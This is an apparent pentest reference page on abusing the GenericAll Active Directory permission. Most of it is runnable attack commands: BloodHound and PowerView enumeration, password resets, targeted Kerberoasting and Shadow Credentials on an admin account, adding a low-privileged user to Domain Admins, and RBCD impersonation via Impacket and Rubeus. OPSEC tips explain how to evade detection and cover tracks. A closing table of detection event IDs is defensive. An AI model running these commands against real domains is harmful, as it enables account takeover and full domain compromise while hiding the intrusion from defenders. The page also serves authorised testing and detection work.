attack-19-genericall-abuse.md (18928B)
1 --- 2 title: "Attack #19 โ GenericAll Abuse" 3 description: "GenericAll is the most dangerous misconfigured ACL permission in Active Directory. It grants a principal (user, group, or computer) full control over aโฆ" 4 category: active-directory 5 subcategory: "ACL Abuse" 6 tags: ["active-directory", "kerberos", "adcs", "delegation", "privilege-escalation"] 7 tools: ["NetExec", "Impacket", "Rubeus", "Certipy", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ก Attack #19 โ GenericAll Abuse.md" 11 --- 12 # ๐ก Attack #19 โ GenericAll Abuse 13 14 *** 15 16 ## ๐ How It Works 17 18 GenericAll is the **most dangerous misconfigured ACL permission in Active Directory**. It grants a principal (user, group, or computer) **full control** over a target AD object โ equivalent to owning it entirely. When a low-privileged user has GenericAll over a high-value target (Domain Admin account, privileged group, computer object, GPO, or OU), they can escalate to full domain compromise in a single move. 19 20 The attack exploits the **Discretionary Access Control List (DACL)** that governs permissions on every AD object. DACLs contain Access Control Entries (ACEs) that define which principals can perform which operations on the object. A GenericAll ACE grants the equivalent of all individual permissions combined: read, write, delete, modify owner, modify DACL, reset password, write to any attribute, and add/remove group members. These misconfigurations are **extremely common** in enterprise environments โ often introduced by helpdesk delegation, migration tools, Exchange setup, or administrators who didn't understand the permission model. 21 22 ### What GenericAll Lets You Do (By Target Type) 23 24 | Target Object Type | What You Can Do | Impact | 25 |---|---|---| 26 | **User** | Reset their password, set SPN (Kerberoast), write to msDS-KeyCredentialLink (Shadow Credentials) | Full account takeover โ if target is DA, you own the domain | 27 | **Group** | Add yourself (or any user) as a member | Instant privilege escalation โ add yourself to Domain Admins | 28 | **Computer** | Write msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD), read LAPS password | Machine compromise, RBCD โ impersonate any user to that host | 29 | **GPO** | Modify Group Policy โ add scheduled tasks, startup scripts, user rights | Push malicious config to all machines linked to that GPO | 30 | **OU** | Modify inheritance, add malicious GPO links | Control all objects in the OU | 31 | **Domain Object** | Write to any domain-level attribute โ DCSync ACE, modify trusts | Total domain compromise | 32 33 ### The Full Attack Flow 34 35 ``` 36 1. Gain initial foothold (any domain user account) 37 2. Run BloodHound or PowerView to enumerate ACLs 38 3. Identify GenericAll edges from your controlled principal to high-value targets 39 4. Exploit based on target object type: 40 - User โ reset password or set Shadow Credentials 41 - Group โ add yourself as a member 42 - Computer โ configure RBCD or read LAPS 43 5. Escalate to Domain Admin 44 6. Optionally restore original ACL state to cover tracks 45 ``` 46 47 *** 48 49 ## โ๏ธ Prerequisites 50 51 | Requirement | Detail | 52 |---|---| 53 | **Domain user account** | Any authenticated domain user โ GenericAll is the permission YOU already have | 54 | **GenericAll ACE on target** | Must exist in the target object's DACL โ use BloodHound or PowerView to find it | 55 | **Network access to DC** | LDAP (389/636) access for ACL queries and modifications | 56 57 *** 58 59 ## ๐ ๏ธ Tools 60 61 | Tool | Platform | Notes | 62 |---|---|---| 63 | **BloodHound + SharpHound** | Windows/Linux | Visual attack path mapping โ identifies GenericAll edges automatically | 64 | **PowerView** | Windows | `Get-ObjectAcl`, `Add-DomainGroupMember`, `Set-DomainUserPassword` | 65 | **Impacket โ dacledit.py** | Linux | Edit DACLs remotely โ add/remove ACEs from Linux | 66 | **Impacket โ owneredit.py** | Linux | Change object ownership | 67 | **Impacket โ addcomputer.py** | Linux | Create machine accounts (for RBCD exploitation) | 68 | **bloodyAD** | Linux | All-in-one AD exploitation โ ACL abuse, password reset, group membership | 69 | **ldap_shell** | Linux | Interactive LDAP shell โ for quick ACL exploitation | 70 | **Certipy** | Linux | Shadow Credentials exploitation when GenericAll on user/computer | 71 72 *** 73 74 ## ๐ป Full Commands 75 76 ### ๐ต Step 1 โ Enumerate GenericAll Permissions 77 78 #### BloodHound (Recommended โ Visual Attack Paths) 79 80 ```powershell 81 # โโ Collect data with SharpHound โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 82 .\SharpHound.exe -c All --zipfilename bloodhound_data.zip 83 # Or 84 .\SharpHound.exe -c All,GPOLocalGroup --zipfilename bloodhound_data.zip 85 86 # โโ Upload to BloodHound and run queries: 87 # Pre-built query: "Find Shortest Paths to Domain Admins" 88 # Pre-built query: "Find Principals with DCSync Rights" 89 # Custom Cypher: Find all GenericAll edges from your user 90 # MATCH p=(n {name:'LOW_USER@CORP.LOCAL'})-[r:GenericAll]->(m) RETURN p 91 ``` 92 93 ```bash 94 # โโ Linux โ BloodHound.py (remote collection without touching the target) โโโโ 95 bloodhound-python -u low_user -p 'Password1' -d corp.local -ns 10.10.10.10 \ 96 -c All --zip 97 # Upload the resulting .zip to BloodHound GUI 98 ``` 99 100 #### PowerView (Detailed ACL Enumeration) 101 102 ```powershell 103 # โโ Find objects where your user has GenericAll โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 104 Import-Module .\PowerView.ps1 105 106 # Get ACLs where current user has GenericAll on any object 107 Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs | 108 Where-Object { $_.ActiveDirectoryRights -match "GenericAll" } | 109 Select-Object SecurityIdentifier, ActiveDirectoryRights, ObjectDN 110 111 # Resolve SIDs to names 112 Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs | 113 Where-Object { $_.ActiveDirectoryRights -match "GenericAll" } | 114 ForEach-Object { 115 $_ | Add-Member -NotePropertyName "Principal" -NotePropertyValue ( 116 Convert-SidToName $_.SecurityIdentifier 117 ) -PassThru 118 } | Select-Object Principal, ActiveDirectoryRights, ObjectDN 119 120 # โโ Enumerate all ACL attack paths from a specific user โโโโโโโโโโโโโโโโโโโโโโ 121 Find-InterestingDomainAcl -ResolveGUIDs | 122 Where-Object { $_.IdentityReferenceName -match "low_user" } 123 124 # โโ Check specific object for dangerous ACEs โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 125 Get-ObjectAcl -SamAccountName "Administrator" -ResolveGUIDs | 126 Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner|GenericWrite" } 127 ``` 128 129 *** 130 131 ### ๐ด Exploitation โ GenericAll on a USER 132 133 ```powershell 134 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 135 # METHOD 1: Force Password Reset (loudest โ generates 4724 event) 136 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 137 138 # โโ PowerView โ reset the target user's password โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 139 $NewPassword = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force 140 Set-DomainUserPassword -Identity targetadmin -AccountPassword $NewPassword -Verbose 141 142 # โโ Native PowerShell (AD module) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 143 Set-ADAccountPassword -Identity targetadmin -NewPassword ( 144 ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force 145 ) -Reset 146 147 # โโ net user โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 148 net user targetadmin P@ssword123! /domain 149 150 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 151 # METHOD 2: Targeted Kerberoasting (stealthier โ set SPN, roast, remove SPN) 152 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 153 154 # Step 1: Set an SPN on the target user (requires GenericAll/GenericWrite) 155 Set-DomainObject -Identity targetadmin -Set @{serviceprincipalname='nonexist/YOURSPN'} 156 157 # Step 2: Request TGS for the newly-set SPN (Kerberoast) 158 .\Rubeus.exe kerberoast /user:targetadmin /outfile:targeted_roast.txt 159 160 # Step 3: Crack the hash offline 161 hashcat -m 13100 targeted_roast.txt rockyou.txt --force 162 163 # Step 4: Remove the SPN (cover tracks) 164 Set-DomainObject -Identity targetadmin -Clear serviceprincipalname 165 166 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 167 # METHOD 3: Shadow Credentials (stealthiest โ write msDS-KeyCredentialLink) 168 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 169 170 # Windows โ Whisker 171 .\Whisker.exe add /target:targetadmin /domain:corp.local 172 # Whisker outputs a Rubeus command to request a TGT with the new credential 173 # Run the outputted command to get a TGT as targetadmin 174 175 # Linux โ pywhisker 176 python3 pywhisker.py -d corp.local -u low_user -p 'Password1' \ 177 --target targetadmin --action add --dc-ip 10.10.10.10 178 # Then use the generated PFX certificate to authenticate: 179 # certipy auth -pfx <generated>.pfx -dc-ip 10.10.10.10 180 ``` 181 182 ```bash 183 # โโ Linux โ Reset password via Impacket / bloodyAD โโโโโโโโโโโโโโโโโโโโโโโโโโโโ 184 185 # bloodyAD (simplest) 186 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 187 set password targetadmin 'P@ssword123!' 188 189 # Impacket โ using rpcclient-style approach 190 net rpc password targetadmin 'P@ssword123!' -U 'corp.local/low_user%Password1' \ 191 -S DC01.corp.local 192 193 # Impacket โ ldap_shell for interactive exploitation 194 python3 ldap_shell.py corp.local/low_user:'Password1'@DC01.corp.local 195 # > set_password targetadmin P@ssword123! 196 197 # Shadow Credentials from Linux 198 certipy shadow auto -u low_user@corp.local -p 'Password1' \ 199 -account targetadmin -dc-ip 10.10.10.10 -dc-host dc01.corp.local 200 ``` 201 202 *** 203 204 ### ๐ด Exploitation โ GenericAll on a GROUP 205 206 ```powershell 207 # โโ Add yourself to Domain Admins โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 208 # PowerView 209 Add-DomainGroupMember -Identity "Domain Admins" -Members "low_user" -Verbose 210 211 # Native PowerShell 212 Add-ADGroupMember -Identity "Domain Admins" -Members "low_user" 213 214 # net group 215 net group "Domain Admins" low_user /add /domain 216 217 # โโ Verify โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 218 Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name 219 net group "Domain Admins" /domain 220 ``` 221 222 ```bash 223 # โโ Linux โ Add yourself to group โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 224 225 # bloodyAD 226 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 227 add groupMember "Domain Admins" low_user 228 229 # Impacket โ ldap_shell 230 python3 ldap_shell.py corp.local/low_user:'Password1'@DC01.corp.local 231 # > add_user_to_group low_user "Domain Admins" 232 233 # NetExec โ verify 234 nxc smb DC01.corp.local -u low_user -p 'Password1' -x "whoami /groups" 235 ``` 236 237 *** 238 239 ### ๐ด Exploitation โ GenericAll on a COMPUTER 240 241 ```powershell 242 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 243 # METHOD 1: Resource-Based Constrained Delegation (RBCD) 244 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 245 246 # Step 1: Create a machine account (or use one you control) 247 New-MachineAccount -MachineAccount FAKEMACHINE -Password $(ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force) 248 249 # Step 2: Get the SID of your machine account 250 $ComputerSid = Get-DomainComputer FAKEMACHINE -Properties objectsid | Select -Expand objectsid 251 252 # Step 3: Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute 253 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 254 $SDBytes = New-Object byte[] ($SD.BinaryLength) 255 $SD.GetBinaryForm($SDBytes, 0) 256 Set-DomainObject -Identity TARGET_COMPUTER$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 257 258 # Step 4: S4U2Self + S4U2Proxy to impersonate DA to target 259 .\Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<FAKEMACHINE_HASH> \ 260 /impersonateuser:Administrator \ 261 /msdsspn:CIFS/TARGET_COMPUTER.corp.local /ptt 262 263 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 264 # METHOD 2: Read LAPS Password (if LAPS is deployed) 265 # โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 266 Get-DomainComputer TARGET_COMPUTER -Properties ms-Mcs-AdmPwd 267 # Output: ms-Mcs-AdmPwd = <cleartext local admin password> 268 ``` 269 270 ```bash 271 # โโ Linux โ RBCD exploitation โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 272 273 # Step 1: Create machine account 274 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \ 275 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 276 277 # Step 2: Configure RBCD 278 rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET_COMPUTER$' \ 279 -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 280 281 # Step 3: Get impersonated ticket via S4U 282 getST.py -spn cifs/TARGET_COMPUTER.corp.local -impersonate Administrator \ 283 -dc-ip 10.10.10.10 corp.local/'FAKEMACHINE$':'FakePass123!' 284 285 # Step 4: Use the ticket 286 export KRB5CCNAME=Administrator@cifs_TARGET_COMPUTER.corp.local@CORP.LOCAL.ccache 287 psexec.py -k -no-pass corp.local/Administrator@TARGET_COMPUTER.corp.local 288 ``` 289 290 *** 291 292 ## ๐ฏ OPSEC Tips 293 294 - **Prefer Shadow Credentials over password reset** โ Shadow Credentials (writing msDS-KeyCredentialLink) are stealthier because the original user's password remains unchanged and they can still log in normally; password resets immediately alert the target user and generate Event 4724 295 - **Targeted Kerberoasting is the middle ground** โ setting a temporary SPN, roasting, and removing the SPN is stealthier than password reset but noisier than Shadow Credentials 296 - **Remove yourself from groups after** โ if you add yourself to Domain Admins, extract what you need (KRBTGT hash via DCSync) and then remove yourself; the shorter the group membership window, the less likely detection 297 - **Check AdminCount** โ users with `adminCount=1` are protected by AdminSDHolder; modifying their permissions may be reverted every 60 minutes 298 - **Log the original ACL state** โ before modifying any ACLs for exploitation, save the original state so you can restore it to cover your tracks 299 300 *** 301 302 ## ๐ก๏ธ Detection โ Event IDs 303 304 | Event ID | Source | What to Look For | 305 |---|---|---| 306 | **4724** | Security Log | Password reset attempt โ monitor for non-helpdesk accounts resetting privileged user passwords | 307 | **4728** | Security Log | User added to a security-enabled global group โ DA group modification | 308 | **4732** | Security Log | User added to a security-enabled local group | 309 | **4756** | Security Log | User added to a security-enabled universal group โ Enterprise Admins | 310 | **5136** | Security Log | Directory service object modification โ ACL changes, attribute writes (msDS-KeyCredentialLink, msDS-AllowedToActOnBehalfOfOtherIdentity) | 311 | **4662** | Security Log | Operation performed on an AD object โ catches GenericAll usage | 312 | **4738** | Security Log | User account changed โ SPN modification for targeted Kerberoasting | 313 314 **Primary detection signature:** Monitor Event ID **5136** for modifications to sensitive attributes: `msDS-KeyCredentialLink` (Shadow Credentials), `msDS-AllowedToActOnBehalfOfOtherIdentity` (RBCD), and `servicePrincipalName` (targeted Kerberoasting). Combined with **4728** for unexpected Domain Admins group additions and **4724** for password resets of privileged accounts by non-privileged users. BloodHound's "Dangerous Rights" queries run defensively can identify these misconfigurations before attackers do. 315 316 *** 317 318 ## ๐ Attack Chain Context 319 320 ``` 321 [GenericAll Abuse] โโโ Direct Privilege Escalation 322 โ 323 โโโโ ๐ค GenericAll on User โ password reset / Shadow Creds / Kerberoast 324 โโโโ ๐ฅ GenericAll on Group โ add self to Domain Admins 325 โโโโ ๐ป GenericAll on Computer โ RBCD / LAPS password read 326 โโโโ ๐ GenericAll on GPO โ push malicious Group Policy 327 โโโโ ๐ After DA โ DCSync (Attack #37) โ Golden Ticket (Attack #11) 328 โโโโ ๐ Chain with: WriteDACL (#21), WriteOwner (#22), RBCD (#17) 329 โโโโ ๐ Defeated by: ACL auditing, least privilege, AdminSDHolder 330 ``` 331 332 **GenericAll is the most common ACL-based escalation path** found in real-world AD pentests. BloodHound consistently reveals GenericAll edges that organisations didn't know existed โ often created years ago during migration, delegation setup, or Exchange installation. Run BloodHound defensively to find these paths before attackers do. 333 334 *** 335 336 > โ **Attack #19 โ GenericAll Abuse complete.**